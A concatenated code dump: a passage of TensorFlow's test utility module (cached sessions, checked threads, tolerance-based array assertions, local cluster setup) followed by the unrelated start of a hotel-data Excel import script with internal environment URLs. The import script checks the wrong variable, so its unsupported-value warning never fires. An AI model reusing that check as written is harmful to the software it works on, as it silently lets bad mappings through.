This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = allow_soft_placement
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = config_pb2.ConfigProto()
config_copy.CopyFrom(config)
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used to
instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
batch_read_excel.py
|
#!/usr/local/Cellar/python/3.7.4_1/bin/python3 python3
# -*- coding:utf-8 -*-
import sys, os, datetime, openpyxl, json, threading
from multiprocessing import Pool
data_dict = {
'0': { # 酒店
'hotelType': {
'经济型': 1,
'主题': 2,
'商务型': 3,
'公寓': 4,
'客栈': 5,
'青年旅社': 6,
'度假酒店': 7,
'星级酒店': 8
},
'type': {
# '直营': 1,
# '加盟': 2,
# 'EGM': 4,
'千屿2.0': 5
},
'brandType': {
'千屿': 10,
'千寻': 11
}
},
'1': { # 联系人
'type': { # 联系人类型
'业主': 'owner',
'经理': 'manager',
'前台': 'receptionist',
'店长': 'hotel_manager',
'股东': 'shareholder',
'其他': 'others'
}
},
'2': { # OTA账号
'type': { # ota账号类型
'美团': 'meituan',
'携程': 'ctrip',
'去哪儿': 'qunar',
'艺龙': 'elong',
'飞猪': 'fliggy',
'阿里商旅': 'AliTmc'
}
},
'3': { # 企业法人
'type': { # 企业类型
'有限责任公司(自然人独资)': 'company',
'个体商户': 'single',
'个体工商户': 'single',
'有限责任公司': 'limitedLiabilityCompany',
'个人独资企业': 'soleProprietorship',
'有限合伙': 'limitedPartnership',
'股份有限公司': 'incorporatedCompany',
'其他': 'others'
},
'certificateType': { # 证件类型
'身份证': 'CERTIFICATE_01'
},
'accountType': { # 收款账号类型
'对公账户': 1,
'对公': 1,
'对私账户': 2,
'对私': 2,
'私人账户': 2
}
},
'4': { # 房间
'roomTypeId': { # 房型
'标准大床房': 20,
'豪华大床房': 26,
'标准双床房': 29,
'豪华双床房': 30,
'三人房': 33,
'主题房': 34,
'特惠房': 51
},
'bedInfoId': {
'单人床1.0米': 1,
'单人床1.2米': 2,
'单人床1.35米': 3,
'单人床1.5米': 4,
'大床1.5米': 5,
'大床1.8米': 6,
'大床2.0米': 7,
'大床2.2米': 8,
'圆床2.0米': 9,
'圆床2.2米': 10,
'圆床2.4米': 11,
'圆床2.6米': 12,
'圆床2.8米': 13,
'方形水床1.5米': 14,
'方形水床1.8米': 15,
'方形水床2.0米': 16,
'方形水床2.2米': 17,
'原型水床2.0米': 18,
'原型水床2.2米': 19,
'原型水床2.4米': 20,
'原型水床2.6米': 21,
'原型水床2.8米': 22
}
},
'5': { # 基础设施
'a': 1003, # 停车场-收费
'b': 1004, # 停车场-不收费
'c': 1063, # 无停车场
'd': 176, # 会议室
'e': 3, # WIFI覆盖
'f': 157, # 餐厅
'g': 2029, # 休息区
'h': 180, # 免费洗漱用品
'i': 2024, # 提供洗漱用品
'k': 10031, # 免费早餐
'm': 10032, # 收费早餐
'n': 10033, # 无早餐
'o': 166, # 接送服务
'p': 170, # 行李寄存
'q': 171, # 叫醒服务
'r': 104, # 洗衣服务
's': 160, # 银行卡支付
't': 70007, # 支付宝
'u': 70008, # 微信
'v': 70009, # 现金
},
'6': {
# 'accountType': {
# '对公': 1,
# '对公账户': 1,
# '对私账户': 2,
# '对私': 2,
# '私人账户': 2
# },
'idCardType': { # 证件类型
'身份证': 'CERTIFICATE_01'
}
},
'env': {
'local': '127.0.0.1:5000',
'dev': 'http://backend-product-service.dev.ahotels.tech',
'test': 'http://backend-product-service.test.ahotels.tech',
'uat': 'http://ali.uat.ahotels.tech/product-service',
'prod': 'http://backend-product-service.ahotels.tech'
}
}
# excel目录
dir = sys.argv[1]
# 环境
env = sys.argv[2]
# 读sheet
def get_sheet_data(sheet_data, index=None):
# 全部数据
row_list = []
# 行号
row_num = -1
# json的key值
row_header = None
for row in sheet_data.rows:
row_num = row_num + 1
# 字段名
if row_num == 0:
row_header = [col.value for col in row]
continue
# 跳过表头
if row_num == 1:
continue
# 一行数据
row_data = {}
line_data = [col.value for col in row]
for i, value in enumerate(line_data):
key = row_header[i]
# 跳过key或者value为空的列
if key is None or value is None:
continue
if index is not None:
value_dict = data_dict.get(str(index), {}).get(key)
if value_dict is not None:
if isinstance(value_dict, dict):
temp_value = value_dict.get(value)
if value is None:
print('不支持的字典: sheet=%s, key=%s, value=%s' % (index, key, temp_value))
value = temp_value
